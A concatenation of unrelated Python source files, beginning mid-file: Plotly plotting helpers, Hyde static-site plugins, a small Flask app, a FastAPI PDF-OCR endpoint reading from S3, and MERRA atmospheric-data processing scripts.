if x_log:
x_layout['type'] = 'log'
y_layout = dict(title=y_title, zeroline=False, exponentformat="power",
showexponent="all", showgrid=True,
showline=True, mirror="all", ticks="inside")
if y_log:
y_layout['type'] = 'log'
layout = go.Layout(
showlegend=show_legend,
autosize=True,
width=width,
height=height,
margin=dict(t=40, b=40, l=80, r=40),
hovermode='closest',
bargap=0,
xaxis=x_layout,
yaxis=y_layout
)
fig = go.Figure(data=data, layout=layout)
py.iplot(fig, show_link=False)
def plot_heatmap(x, y, z, x_title='', y_title='', surface=False,
x_log=False, y_log=False, z_min=None, z_max=None):
"""
Produce a 2D plot
"""
from plotly.offline import plot
import plotly.graph_objs as go
x_layout = dict(title=x_title, zeroline=False, exponentformat="power",
showexponent="all", showgrid=True,
showline=True, mirror="all", ticks="inside")
if x_log:
x_layout['type'] = 'log'
y_layout = dict(title=y_title, zeroline=False, exponentformat="power",
showexponent="all", showgrid=True,
showline=True, mirror="all", ticks="inside")
if y_log:
y_layout['type'] = 'log'
layout = go.Layout(
showlegend=False,
autosize=True,
width=600,
height=500,
margin=dict(t=40, b=40, l=80, r=40),
hovermode='closest',
bargap=0,
xaxis=x_layout,
yaxis=y_layout
)
colorscale=[
[0, "rgb(0,0,131)"], [0.125, "rgb(0,60,170)"], [0.375, "rgb(5,255,255)"],
[0.625, "rgb(255,255,0)"], [0.875, "rgb(250,0,0)"], [1, "rgb(128,0,0)"]
]
plot_type = 'surface' if surface else 'heatmap'
trace = go.Heatmap(z=z, x=x, y=y, autocolorscale=False,# type=plot_type,
hoverinfo="x+y+z", colorscale=colorscale,
zauto=z_min is None, zmin=z_min, zmax=z_max)
fig = go.Figure(data=[trace], layout=layout)
py.iplot(fig, show_link=False)
def fill_dict(accum_dict, value):
if value[0] in ['#', 'File']:
accum_dict[value[0]] = value[1]
elif value[0] in ['#', 'DB_ID', 'P0', 'PN', 'dpix', 'number']:
accum_dict[value[0]] = int(value[1])
elif value[0] == 'extract_fan':
accum_dict[value[0]] = value[1] == 'True'
else:
accum_dict[value[0]] = float(value[1])
return accum_dict
def read_settings(file_path):
DATA_BLOCK = 0
DIRECT_BEAM_BLOCK = 1
DATA_RUN_BLOCK = 2
DIRECT_BEAM_HEADERS = ['#', 'DB_ID', 'P0', 'PN', 'x_pos', 'x_width',
'y_pos', 'y_width', 'bg_pos', 'bg_width',
'dpix', 'tth', 'number', 'File']
DATA_RUN_HEADERS = ['#', 'scale', 'P0', 'PN', 'x_pos', 'x_width',
'y_pos', 'y_width', 'bg_pos', 'bg_width',
'extract_fan', 'dpix', 'tth', 'number', 'DB_ID', 'File']
reduction_settings = {'direct_beam_runs': [], 'data_runs': [], 'process_type': 'Specular'}
fd = open(file_path, 'r')
current_block = DATA_BLOCK
for line in fd.readlines():
if "# Type:" in line:
toks = line.strip().split()
reduction_settings['process_type'] = toks[2]
continue
elif "[Direct Beam Runs]" in line:
current_block = DIRECT_BEAM_BLOCK
continue
elif "[Data Runs]" in line:
current_block = DATA_RUN_BLOCK
continue
elif "[Data]" in line:
break
if line.startswith('#') and current_block == DIRECT_BEAM_BLOCK:
# Skip the column names
if line.startswith('# DB_ID'):
continue
toks = line.strip().split()
if len(toks) == len(DIRECT_BEAM_HEADERS):
settings_dict = reduce(fill_dict, zip(DIRECT_BEAM_HEADERS, toks), {})
reduction_settings['direct_beam_runs'].append(settings_dict)
elif line.startswith('#') and current_block == DATA_RUN_BLOCK:
# Skip the column names
if line.startswith('# scale'):
continue
toks = line.strip().split()
if len(toks) == len(DATA_RUN_HEADERS):
settings_dict = reduce(fill_dict, zip(DATA_RUN_HEADERS, toks), {})
reduction_settings['data_runs'].append(settings_dict)
return reduction_settings
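# Illustrative usage (hypothetical file name; the file is assumed to follow the
# QuickNXS-style reduction header parsed above):
#
#     settings = read_settings('REF_M_12345_Specular.dat')
#     print(settings['process_type'])
#     print(len(settings['direct_beam_runs']), len(settings['data_runs']))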
```
|
{
"source": "JeNeSuisPasDave/hyde",
"score": 2
}
|
#### File: ext/plugins/structure.py
```python
from hyde.ext.plugins.meta import Metadata
from hyde.plugin import Plugin
from hyde.site import Resource
from hyde.util import pairwalk
from fswrap import File, Folder
from functools import reduce  # needed by Paginator.walk_paged_resources on Python 3
import os
from fnmatch import fnmatch
import operator
#
# Folder Flattening
#
class FlattenerPlugin(Plugin):
"""
The plugin class for flattening nested folders.
"""
def __init__(self, site):
super(FlattenerPlugin, self).__init__(site)
def begin_site(self):
"""
Finds all the folders that need flattening and changes the
relative deploy path of all resources in those folders.
"""
items = []
try:
items = self.site.config.flattener.items
except AttributeError:
pass
for item in items:
node = None
target = ''
try:
node = self.site.content.node_from_relative_path(item.source)
target = Folder(item.target)
except AttributeError:
continue
if node:
for resource in node.walk_resources():
target_path = target.child(resource.name)
self.logger.debug(
'Flattening resource path [%s] to [%s]' %
(resource, target_path))
resource.relative_deploy_path = target_path
for child in node.walk():
child.relative_deploy_path = target.path
#
# Combine
#
class CombinePlugin(Plugin):
"""
To use this combine, the following configuration should be added
to meta data::
combine:
sort: false #Optional. Defaults to true.
root: content/media #Optional. Path must be relative to content
folder - default current folder
recurse: true #Optional. Default false.
files:
- ns1.*.js
- ns2.*.js
where: top
remove: yes
`files` is a list of resources (or just a resource) that should be
    combined. Globbing is performed. `where` indicates where the
    combination should be done; this can be the `top` or `bottom` of the
    file. `remove` tells whether resources that have been combined into
    this one should be removed.
"""
def __init__(self, site):
super(CombinePlugin, self).__init__(site)
def _combined(self, resource):
"""
Return the list of resources to combine to build this one.
"""
try:
config = resource.meta.combine
except AttributeError:
return [] # Not a combined resource
try:
files = config.files
except AttributeError:
raise AttributeError("No resources to combine for [%s]" % resource)
if type(files) is str:
files = [files]
# Grab resources to combine
# select site root
try:
root = self.site.content.node_from_relative_path(
resource.meta.combine.root)
except AttributeError:
root = resource.node
# select walker
try:
recurse = resource.meta.combine.recurse
except AttributeError:
recurse = False
walker = root.walk_resources() if recurse else root.resources
# Must we sort?
try:
sort = resource.meta.combine.sort
except AttributeError:
sort = True
if sort:
resources = sorted([r for r in walker
if any(fnmatch(r.name, f) for f in files)],
key=operator.attrgetter('name'))
else:
resources = [(f, r)
for r in walker for f in files if fnmatch(r.name, f)]
resources = [r[1] for f in files for r in resources if f in r]
if not resources:
self.logger.debug("No resources to combine for [%s]" % resource)
return []
return resources
def begin_site(self):
"""
Initialize the plugin and search for the combined resources
"""
for node in self.site.content.walk():
for resource in node.resources:
resources = self._combined(resource)
if not resources:
continue
# Build depends
if not hasattr(resource, 'depends'):
resource.depends = []
resource.depends.extend(
[r.relative_path for r in resources
if r.relative_path not in resource.depends])
# Remove combined resources if needed
if hasattr(resource.meta.combine, "remove") and \
resource.meta.combine.remove:
for r in resources:
self.logger.debug(
"Resource [%s] removed because combined" % r)
r.is_processable = False
def begin_text_resource(self, resource, text):
"""
When generating a resource, add combined file if needed.
"""
resources = self._combined(resource)
if not resources:
return
where = "bottom"
try:
where = resource.meta.combine.where
except AttributeError:
pass
if where not in ["top", "bottom"]:
raise ValueError("%r should be either `top` or `bottom`" % where)
self.logger.debug(
"Combining %d resources for [%s]" % (len(resources),
resource))
if where == "top":
return "".join([r.source.read_all() for r in resources] + [text])
else:
return "".join([text] + [r.source.read_all() for r in resources])
#
# Pagination
#
class Page:
def __init__(self, posts, number):
self.posts = posts
self.number = number
class Paginator:
"""
Iterates resources which have pages associated with them.
"""
file_pattern = 'page$PAGE/$FILE$EXT'
def __init__(self, settings):
self.sorter = getattr(settings, 'sorter', None)
self.size = getattr(settings, 'size', 10)
self.file_pattern = getattr(
settings, 'file_pattern', self.file_pattern)
def _relative_url(self, source_path, number, basename, ext):
"""
Create a new URL for a new page. The first page keeps the same name;
the subsequent pages are named according to file_pattern.
"""
path = File(source_path)
if number != 1:
filename = self.file_pattern.replace('$PAGE', str(number)) \
.replace('$FILE', basename) \
.replace('$EXT', ext)
path = path.parent.child(os.path.normpath(filename))
return path
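    # e.g. with the default file_pattern, page 3 of "blog/index.html" would map to
    # "blog/page3/index.html" (illustrative only; actual paths depend on the node layout)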
def _new_resource(self, base_resource, node, page_number):
"""
Create a new resource as a copy of a base_resource, with a page of
resources associated with it.
"""
res = Resource(base_resource.source_file, node)
res.node.meta = Metadata(node.meta)
res.meta = Metadata(base_resource.meta, res.node.meta)
brs = base_resource.source_file
path = self._relative_url(base_resource.relative_path,
page_number,
brs.name_without_extension,
brs.extension)
res.set_relative_deploy_path(path)
return res
@staticmethod
def _attach_page_to_resource(page, resource):
"""
Hook up a page and a resource.
"""
resource.page = page
page.resource = resource
@staticmethod
def _add_dependencies_to_resource(dependencies, resource):
"""
Add a bunch of resources as dependencies to another resource.
"""
if not hasattr(resource, 'depends'):
resource.depends = []
resource.depends.extend([dep.relative_path for dep in dependencies
if dep.relative_path not in resource.depends])
def _walk_pages_in_node(self, node):
"""
Segregate each resource into a page.
"""
walker = 'walk_resources'
if self.sorter:
walker = 'walk_resources_sorted_by_%s' % self.sorter
walker = getattr(node, walker, getattr(node, 'walk_resources'))
posts = list(walker())
number = 1
while posts:
yield Page(posts[:self.size], number)
posts = posts[self.size:]
number += 1
def walk_paged_resources(self, node, resource):
"""
Group the resources and return the new page resources.
"""
added_resources = []
pages = list(self._walk_pages_in_node(node))
if pages:
deps = reduce(list.__add__, [page.posts for page in pages], [])
Paginator._attach_page_to_resource(pages[0], resource)
Paginator._add_dependencies_to_resource(deps, resource)
for page in pages[1:]:
# make new resource
new_resource = self._new_resource(resource, node, page.number)
Paginator._attach_page_to_resource(page, new_resource)
new_resource.depends = resource.depends
added_resources.append(new_resource)
for prev, next in pairwalk(pages):
next.previous = prev
prev.next = next
return added_resources
class PaginatorPlugin(Plugin):
"""
Paginator plugin.
Configuration: in a resource's metadata:
paginator:
sorter: time
size: 5
file_pattern: page$PAGE/$FILE$EXT # optional
then in the resource's content:
{% for res in resource.page.posts %}
{% refer to res.relative_path as post %}
{{ post }}
{% endfor %}
{{ resource.page.previous }}
{{ resource.page.next }}
"""
def __init__(self, site):
super(PaginatorPlugin, self).__init__(site)
def begin_site(self):
for node in self.site.content.walk():
added_resources = []
paged_resources = (res for res in node.resources
if hasattr(res.meta, 'paginator'))
for resource in paged_resources:
paginator = Paginator(resource.meta.paginator)
added_resources += paginator.walk_paged_resources(
node, resource)
node.resources += added_resources
```
|
{
"source": "JeNeSuisPasDave/Selenium-and-TLS",
"score": 2
}
|
#### File: app/main/views.py
```python
from datetime import datetime
from flask import abort, current_app, flash, make_response
from flask import render_template, request, url_for
from . import main
@main.route('/', methods=['GET'])
def index():
return render_template(
'index.html')
@main.route('/shutdown')
def server_shutdown():
if not current_app.testing:
abort(404)
shutdown = request.environ.get('werkzeug.server.shutdown')
if not shutdown:
abort(500)
shutdown()
return 'Shutting down...'
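# Note: this endpoint is only reachable when current_app.testing is True; a test
# client could trigger it with e.g. client.get('/shutdown') (sketch, not part of the app).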
```
|
{
"source": "JenFaith/human-rights-first-asylum-ds-a",
"score": 2
}
|
#### File: human-rights-first-asylum-ds-a/app/main.py
```python
import os
from boto3.session import Session
from botocore.exceptions import ClientError, ConnectionError
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from dotenv import load_dotenv
from app.ocr import make_fields
app = FastAPI(
title="DS API for HRF Asylum",
description="PDF OCR",
docs_url="/"
)
load_dotenv()
app.add_middleware(
CORSMiddleware,
allow_origins=['*'],
allow_credentials=True,
allow_methods=['*'],
allow_headers=['*'],
)
@app.post("/pdf-ocr/{uuid}")
async def pdf_ocr(uuid: str):
"""
Small Test UUID: <b>084d0556-5748-4687-93e3-394707be6cc0</b><br>
Large Test UUID: <b>477307493-V-J-M-AXXX-XXX-639-BIA-Aug-17-2020</b>
"""
try:
s3 = Session(
aws_access_key_id=os.getenv('ACCESS_KEY'),
aws_secret_access_key=os.getenv('SECRET_KEY'),
).client('s3')
response = s3.get_object(
Bucket=os.getenv('BUCKET_NAME'),
Key=f"{uuid}.pdf",
)
fields = make_fields(response['Body'].read())
return {
"status": f"File received: {uuid}.pdf",
"body": fields,
}
except ConnectionError:
return {"status": "Connection refused!"}
except ClientError:
return {"status": f"File not found: {uuid}.pdf"}
```
|
{
"source": "jenfly/atmos-read",
"score": 3
}
|
#### File: jenfly/atmos-read/pydap_auth.py
```python
import cookielib
import netrc
import urllib2
import re
import pydap.lib
from pydap.exceptions import ClientError
import logging
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
# Set the debug level for urllib2.
debuglevel=1
def install_basic_client(uri='', user='', passwd='', use_netrc=True):
# Create special opener with support for Cookies
cj = cookielib.CookieJar()
    # Create the password manager and load it with the credentials
pwMgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
    # Get passwords from the .netrc file unless use_netrc is False
if use_netrc:
logins = netrc.netrc()
        accounts = logins.hosts  # a dict mapping hosts to (login, account, password) tuples
for host, info in accounts.iteritems():
login, account, password = info
log.debug('Host: %s; login: %s; account: %s; password: %s' % (host, login, account, password))
pwMgr.add_password(None, host, login, password)
if uri and user and passwd:
pwMgr.add_password(None, uri, user, passwd)
opener = urllib2.build_opener(urllib2.HTTPBasicAuthHandler(pwMgr),
urllib2.HTTPCookieProcessor(cj))
opener.addheaders = [('User-agent', pydap.lib.USER_AGENT)]
urllib2.install_opener(opener)
def new_request(url):
log.debug('Opening %s (install_basic_client)' % url)
r = urllib2.urlopen(url)
resp = r.headers.dict
resp['status'] = str(r.code)
data = r.read()
# When an error is returned, we parse the error message from the
# server and return it in a ``ClientError`` exception.
if resp.get("content-description") == "dods_error":
m = re.search('code = (?P<code>\d+);\s*message = "(?P<msg>.*)"',
data, re.DOTALL | re.MULTILINE)
msg = 'Server error %(code)s: "%(msg)s"' % m.groupdict()
raise ClientError(msg)
return resp, data
from pydap.util import http
http.request = new_request
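# Illustrative usage (hypothetical OPeNDAP URL; credentials may also come from ~/.netrc):
#
#     install_basic_client()
#     from pydap.client import open_url
#     dataset = open_url('http://example.com/opendap/some_dataset.nc')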
```
#### File: scripts/fram/daily1.py
```python
import sys
sys.path.append('/home/jwalker/dynamics/python/atmos-tools')
sys.path.append('/home/jwalker/dynamics/python/atmos-read')
import os
import xray
import numpy as np
import collections
import time
import matplotlib.pyplot as plt
import pandas as pd
import atmos as atm
import precipdat
import merra
# ----------------------------------------------------------------------
# Download daily data
#version = 'merra'
#years = range(2006, 2016, 2)
version = 'merra2'
years = np.arange(1981, 1982)
datadir = atm.homedir() + 'datastore/' + version + '/daily/'
months = np.arange(1, 13)
varnms = ['U', 'V', 'OMEGA', 'T', 'QV', 'H', 'DUDTANA', 'PS',
'UFLXCPT', 'VFLXCPT', 'UFLXPHI', 'VFLXPHI']
latlon=(-90, 90, 40, 120)
plevs = [1000,925,850,775,700,600,500,400,300,250,200,150,100,70,50,30,20]
sector_lons=(60, 100)
dp_vars = []
def group_variables(varnms, version):
"""Group variables together according to URL."""
def get_group(varnm, version):
opts = merra.url_opts(varnm, version)
group = '%s%s_%s_%s' % (opts['res'], opts['vertical'], opts['kind'],
opts['time_kind'])
return group
groups = {nm : get_group(nm, version) for nm in varnms}
keys = set(groups.values())
vargroups = collections.defaultdict(list)
for nm, key in groups.iteritems():
vargroups[key] += [nm]
return vargroups
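# Illustrative result: group_variables(['U', 'V', 'PS'], 'merra2') returns a dict
# keyed by '<res><vertical>_<kind>_<time_kind>' strings built from merra.url_opts(),
# e.g. something like {'3dP_asm_inst': ['U', 'V'], '2dX_asm_inst': ['PS']} --
# the key names here are illustrative only.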
def get_filename(var, version, datadir, year, month=None, day=None):
"""Return a filename for a variable."""
filenm = datadir + version + '_' + var.attrs['filestr'] + '_%d' % year
if month is not None:
filenm = filenm + '%02d' % month
if day is not None:
filenm = filenm + '%02d' % day
filenm = filenm + '.nc'
return filenm
def latlon_filestr(lat1, lat2, lon1, lon2):
"""Return nicely formatted string for lat-lon range."""
latstr = atm.latlon_str(lat1, lat2, 'lat')
lonstr = atm.latlon_str(lon1, lon2, 'lon')
return lonstr + '_' + latstr
def latlon_data(var, lat1, lat2, lon1, lon2, plev=None):
"""Extract lat-lon subset of data."""
name = var.name
varnm = name
subset_dict = {'lat' : (lat1, lat2), 'lon' : (lon1, lon2)}
latlonstr = latlon_filestr(lat1, lat2, lon1, lon2)
if plev is not None:
name = name + '%d' % plev
subset_dict['plev'] = (plev, plev)
var = atm.subset(var, subset_dict, copy=False, squeeze=True)
var.name = name
var.attrs['filestr'] = '%s_%s' % (name, latlonstr)
var.attrs['varnm'] = varnm
return var
def pgradient(var, lat1, lat2, lon1, lon2, plev):
"""Return d/dp of a lat-lon variable."""
pwidth = 100
p1, p2 = plev - pwidth, plev + pwidth
var = atm.subset(var, {'lat' : (lat1, lat2), 'lon' : (lon1, lon2),
'plev' : (p1, p2)}, copy=False)
latlonstr = latlon_filestr(lat1, lat2, lon1, lon2)
attrs = var.attrs
pname = atm.get_coord(var, 'plev', 'name')
pdim = atm.get_coord(var, 'plev', 'dim')
pres = var[pname]
pres = atm.pres_convert(pres, pres.attrs['units'], 'Pa')
dvar_dp = atm.gradient(var, pres, axis=pdim)
dvar_dp = atm.subset(dvar_dp, {pname : (plev, plev)}, copy=False,
squeeze=True)
varnm = 'D%sDP' % var.name
name = '%s%d' % (varnm, plev)
dvar_dp.name = name
attrs['long_name'] = 'd/dp of ' + var.attrs['long_name']
attrs['standard_name'] = 'd/dp of ' + var.attrs['standard_name']
attrs['units'] = ('(%s)/Pa' % attrs['units'])
attrs[pname] = plev
attrs['filestr'] = '%s_%s' % (name, latlonstr)
attrs['varnm'] = varnm
dvar_dp.attrs = attrs
return dvar_dp
def sector_mean(var, lon1, lon2):
"""Return the sector mean of a variable."""
name = var.name
lonstr = atm.latlon_str(lon1, lon2, 'lon')
if (lon2 - lon1) == 360:
lon1, lon2 = None, None
name_out = name + '_ZON'
else:
name_out = name + '_SEC'
varbar = atm.dim_mean(var, 'lon', lon1, lon2)
varbar.name = name_out
varbar.attrs['varnm'] = name
varbar.attrs['lonstr'] = lonstr
varbar.attrs['filestr'] = '%s_sector_%s' % (name, lonstr)
return varbar
def var_calcs(var, jday=0, latlon=(-90, 90, 40, 120), plevs=(850, 200),
dp_vars=['U', 'OMEGA'], sector_lons=(60, 100)):
"""Process a single variable from a single day."""
lat1, lat2, lon1, lon2 = latlon
opts = merra.url_opts(var.name)
vertical = opts['vertical']
if vertical == 'X':
plevs = [None]
if dp_vars is not None and var.name in dp_vars:
dp = True
else:
dp = False
data = xray.Dataset()
# Lat-lon data
print('Lat-lon data')
for plev in plevs:
print('plev', plev)
var_out = latlon_data(var, lat1, lat2, lon1, lon2, plev)
data[var_out.name] = var_out
if dp:
print('Computing d/dp')
var_out = pgradient(var, lat1, lat2, lon1, lon2, plev)
data[var_out.name] = var_out
# Sector and zonal mean data
print('Computing zonal mean')
var_out = sector_mean(var, 0, 360)
data[var_out.name] = var_out
if vertical == 'P':
print('Computing sector mean')
var_out = sector_mean(var, sector_lons[0], sector_lons[1])
data[var_out.name] = var_out
# Compute daily data from subdaily data
nperday = len(atm.get_coord(data, 'time'))
data = atm.daily_from_subdaily(data, nperday, dayname='day',
dayvals=[jday])
# Make sure output is in a Dataset
if isinstance(data, xray.DataArray):
data = data.to_dataset()
return data
def all_data(ds, varnms, datadir, year, month, day, jday, calc_kw, nc_kw):
"""Process selected variables in a dataset and save each to file."""
files = {}
for nm in varnms:
print(nm)
data = var_calcs(ds[nm], jday, **calc_kw)
filenm = '%s%s_%d%02d%02d.nc' % (datadir, nm, year, month, day)
print('Saving to ' + filenm)
atm.disptime()
data.to_netcdf(filenm, **nc_kw)
files[nm] = filenm
return files
def read_url(url, varnms, datadir, year, month, day, jday, calc_kw, nc_kw):
"""Open url and process selected variables."""
# Number of times to attempt opening url (in case of server problems)
NMAX = 3
# Wait time (seconds) between attempts
WAIT = 5
print('Loading ' + url)
attempt = 0
while attempt < NMAX:
try:
with xray.open_dataset(url) as ds:
files = all_data(ds, varnms, datadir, year, month, day, jday,
calc_kw, nc_kw)
attempt = NMAX
except RuntimeError as err:
attempt += 1
if attempt < NMAX:
print('Error reading file. Attempting again in %d s' % WAIT)
time.sleep(WAIT)
else:
raise err
return files
def read_groups(url_dict, vargroups, datadir, year, month, day, jday, calc_kw,
nc_kw):
"""Process variables for a day, grouped by URL."""
files = {}
for key, varids in vargroups.iteritems():
url = url_dict[key]['%d%02d%02d' % (year, month, day)]
datafiles = read_url(url, varids, datadir, year, month, day, jday,
calc_kw, nc_kw)
files.update(datafiles)
return files
def get_url_dict(year, month, version, vargroups):
"""Return dict of urls for the variable groups."""
url_dict = {}
for key in vargroups:
nm = vargroups[key][0]
url_dict[key] = merra.get_urls(year, month, version, nm)
return url_dict
# Initial setup
vargroups = group_variables(varnms, version)
calc_kw = {'latlon' : latlon, 'plevs' : plevs, 'dp_vars' : dp_vars,
'sector_lons' : sector_lons}
nc_kw = { 'merra2' : {'format' : 'NETCDF4_classic', 'engine' : 'netcdf4'},
'merra' : {'format' : None, 'engine' : None}}[version]
# Read data and concatenate
for year in years:
dailyfiles = collections.defaultdict(list)
for month in months:
url_dict = get_url_dict(year, month, version, vargroups)
days = range(1, atm.days_this_month(year, month) + 1)
jdays = atm.season_days(atm.month_str(month), atm.isleap(year))
for day, jday in zip(days, jdays):
files = read_groups(url_dict, vargroups, datadir, year, month, day,
jday, calc_kw, nc_kw)
for nm in files:
dailyfiles[nm] += [files[nm]]
# Consolidate daily files into yearly files and delete daily files
for nm in dailyfiles:
data = atm.load_concat(dailyfiles[nm], concat_dim='day')
for varnm in data.data_vars:
var = data[varnm]
filenm = get_filename(var, version, datadir, year)
var.name = var.attrs.get('varnm', varnm)
print('Saving to ' + filenm)
atm.save_nc(filenm, var)
print('Deleting daily files')
for filenm in dailyfiles[nm]:
print(filenm)
os.remove(filenm)
```
#### File: scripts/fram/merra-calc_fluxes.py
```python
import sys
sys.path.append('/home/jwalker/dynamics/python/atmos-tools')
sys.path.append('/home/jwalker/dynamics/python/atmos-read')
import atmos as atm
import merra
from merra import calc_fluxes
years = [1979]
months = [1,2,3]
scratchdir = '/net/eady/data1/jwalker/datastore/scratch/'
savedir = '/net/eady/data1/jwalker/datastore/merra/monthly/'
var_ids=['u', 'q', 'T', 'theta', 'theta_e', 'hgt']
def filename(varname, year, month):
datestr = '_flx_%d%02d.nc' % (year, month)
filen = savedir + varname + datestr
print('Saving to ' + filen)
return filen
def extract(ds, var_id):
"""Return variable plus its fluxes from dataset"""
nm = merra.get_varname(var_id)
uvar_nm = 'U*' + nm
vvar_nm = 'V*' + nm
ds_out = ds[nm].to_dataset()
ds_out[uvar_nm] = ds[uvar_nm]
ds_out[vvar_nm] = ds[vvar_nm]
return ds_out
for year in years:
for month in months:
ds = calc_fluxes(year, month, var_ids=var_ids, scratchdir=scratchdir)
for var_id in var_ids:
ds_var = extract(ds, var_id)
ds_var.to_netcdf(filename(var_id, year, month))
```
#### File: scripts/fram/merra-uv_daily_combine.py
```python
import sys
sys.path.append('/home/jwalker/dynamics/python/atmos-tools')
sys.path.append('/home/jwalker/dynamics/python/atmos-read')
import os
import numpy as np
import matplotlib.pyplot as plt
import merra
import atmos as atm
from merra import load_daily_season
datadir = '/home/jwalker/eady/datastore/merra/daily/'
savedir = datadir
#plev = 200
plev = 850
years = np.arange(1979, 2015)
season = 'ann'
lon1, lon2 = 40, 120
lat1, lat2 = -60, 60
nperday = 8
def pathstr(var, plev):
return datadir + 'merra_' + var + str(plev) + '_'
def outfile(year, plev):
lats = atm.latlon_labels([lat1, lat2], 'lat', '%.0f', deg_symbol=False)
lons = atm.latlon_labels([lon1, lon2], 'lon', '%.0f', deg_symbol=False)
subset = '%s-%s_%s-%s' % (lons[0], lons[1], lats[0], lats[1])
return datadir + 'merra_uv%d_%s_%d.nc' % (plev, subset, year)
for year in years:
print('Loading U')
u = load_daily_season(pathstr('u', plev), year, season, 'U',
lat1, lat2, lon1, lon2)
print('Loading V')
v = load_daily_season(pathstr('v', plev), year, season, 'V',
lat1, lat2, lon1, lon2)
print('Calculating vorticity and Rossby number')
rel_vort, _ , _ = atm.vorticity(u, v)
Ro = atm.rossby_num(u, v)
print('Calculating daily means from 3-hourly data')
days = np.arange(1, u.shape[0]/nperday + 1)
u = atm.daily_from_subdaily(u, nperday, dayname='Day', dayvals=days)
v = atm.daily_from_subdaily(v, nperday, dayname='Day', dayvals=days)
rel_vort = atm.daily_from_subdaily(rel_vort, nperday, dayname='Day',
dayvals=days)
Ro = atm.daily_from_subdaily(Ro, nperday, dayname='Day', dayvals=days)
print('Saving to ' + outfile(year, plev))
atm.save_nc(outfile(year, plev), u, v, rel_vort, Ro)
```
#### File: atmos-read/scripts/merra-calc-mfc.py
```python
import sys
sys.path.append('/home/jwalker/dynamics/python/atmos-tools')
sys.path.append('/home/jwalker/dynamics/python/atmos-read')
import xarray as xray
import numpy as np
from datetime import datetime
import matplotlib.pyplot as plt
import pandas as pd
import atmos as atm
import precipdat
import merra
# ----------------------------------------------------------------------
#version, years = 'merra', np.arange(1979, 2015)
version, years = 'merra2', np.arange(1980, 2016)
datadir = atm.homedir() + 'datastore/%s/daily/' % version
months = np.arange(1, 13)
subset = '_40E-120E_90S-90N'
def get_var(datadir, version, varnm, subset, year):
filenm = '%s%s_%s%s_%d.nc' % (datadir, version, varnm, subset, year)
with xray.open_dataset(filenm) as ds:
var = ds[varnm].load()
return var
for year in years:
print('Calculating MFC %d' % year)
uq_int = get_var(datadir, version, 'UFLXQV', subset, year)
vq_int = get_var(datadir, version, 'VFLXQV', subset, year)
mfc = atm.moisture_flux_conv(uq_int, vq_int, already_int=True)
mfc.attrs['long_name'] = mfc.name
mfc.name = 'MFC'
savefile = datadir + '%s_MFC%s_%d.nc' % (version, subset, year)
print('Saving MFC to ' + savefile)
atm.save_nc(savefile, mfc)
```
#### File: atmos-read/scripts/merra-replace-data.py
```python
import sys
sys.path.append('/home/jwalker/dynamics/python/atmos-tools')
sys.path.append('/home/jwalker/dynamics/python/atmos-read')
import os
import shutil
import xarray as xray
import numpy as np
import collections
import time
import matplotlib.pyplot as plt
import pandas as pd
import atmos as atm
import precipdat
import merra
# ----------------------------------------------------------------------
datadir = '/net/eady/data1/jwalker/datastore/merra2/wget/'
savedir = '/net/eady/data1/jwalker/datastore/merra2/merged/'
probdata = pd.read_csv('scripts/merra_urls/merge_data.csv', index_col=0)
# For each corrupted data file:
# - load the corrupted data file
# - load the new downloaded file for the problem day
# - calculate d/dp and other stuff
# - merge the data for the affected day
# - save into data file for the year
def latlon_filestr(lat1, lat2, lon1, lon2):
"""Return nicely formatted string for lat-lon range."""
latstr = atm.latlon_str(lat1, lat2, 'lat')
lonstr = atm.latlon_str(lon1, lon2, 'lon')
return lonstr + '_' + latstr
def latlon_data(var, lat1, lat2, lon1, lon2, plev=None):
"""Extract lat-lon subset of data."""
name = var.name
varnm = name
subset_dict = {'lat' : (lat1, lat2), 'lon' : (lon1, lon2)}
latlonstr = latlon_filestr(lat1, lat2, lon1, lon2)
if plev is not None:
name = name + '%d' % plev
subset_dict['plev'] = (plev, plev)
var = atm.subset(var, subset_dict, copy=False, squeeze=True)
var.name = name
var.attrs['filestr'] = '%s_%s' % (name, latlonstr)
var.attrs['varnm'] = varnm
return var
def pgradient(var, lat1, lat2, lon1, lon2, plev):
"""Return d/dp of a lat-lon variable."""
pwidth = 100
p1, p2 = plev - pwidth, plev + pwidth
var = atm.subset(var, {'lat' : (lat1, lat2), 'lon' : (lon1, lon2),
'plev' : (p1, p2)}, copy=False, squeeze=True)
latlonstr = latlon_filestr(lat1, lat2, lon1, lon2)
attrs = var.attrs
pname = atm.get_coord(var, 'plev', 'name')
pdim = atm.get_coord(var, 'plev', 'dim')
pres = var[pname]
pres = atm.pres_convert(pres, pres.attrs['units'], 'Pa')
dvar_dp = atm.gradient(var, pres, axis=pdim)
dvar_dp = atm.subset(dvar_dp, {pname : (plev, plev)}, copy=False,
squeeze=True)
varnm = 'D%sDP' % var.name
name = '%s%d' % (varnm, plev)
dvar_dp.name = name
attrs['long_name'] = 'd/dp of ' + var.attrs['long_name']
attrs['standard_name'] = 'd/dp of ' + var.attrs['standard_name']
attrs['units'] = ('(%s)/Pa' % attrs['units'])
attrs[pname] = plev
attrs['filestr'] = '%s_%s' % (name, latlonstr)
attrs['varnm'] = varnm
dvar_dp.attrs = attrs
return dvar_dp
def var_calcs(filenm, varnm, plev, latlon=(-90, 90, 40, 120)):
"""Process a single variable from a single day."""
lat1, lat2, lon1, lon2 = latlon
if varnm == 'DUDP':
nm, dp = 'U', True
elif varnm == 'DOMEGADP':
nm, dp = 'OMEGA', True
else:
nm, dp = varnm, False
with xray.open_dataset(filenm) as ds:
var = ds[nm].load()
if dp:
print('Computing d/dp')
var = pgradient(var, lat1, lat2, lon1, lon2, plev)
else:
var = latlon_data(var, lat1, lat2, lon1, lon2, plev)
return var
def process_row(row, datadir, savedir):
filenm1 = row['filename']
year = row['year']
varnm = row['varnm']
plev = row['plev']
jday = row['jday']
filenm2 = datadir + row['datfile']
savefile1 = filenm1
savefile2 = savedir + os.path.split(filenm1)[1]
print('%d, %s, plev=%d' % (year, varnm, plev))
print('Reading original data from ' + filenm1)
with xray.open_dataset(filenm1) as ds:
var1 = ds[varnm].load()
print('Processing new data from ' + filenm2)
var2 = var_calcs(filenm2, varnm, plev)
print('Merging data for jday %d' % jday)
var = var1.copy()
ind = jday - 1
days = atm.get_coord(var1, 'day')
if not days[ind] == jday:
raise ValueError('Days not indexed from 1, need to edit code to handle')
var[ind] = var2
print('Saving to ' + savefile1)
var.to_netcdf(savefile1)
print('Saving to ' + savefile2)
var.to_netcdf(savefile2)
data = {'orig' : var1, 'new' : var2, 'merged' : var}
return data
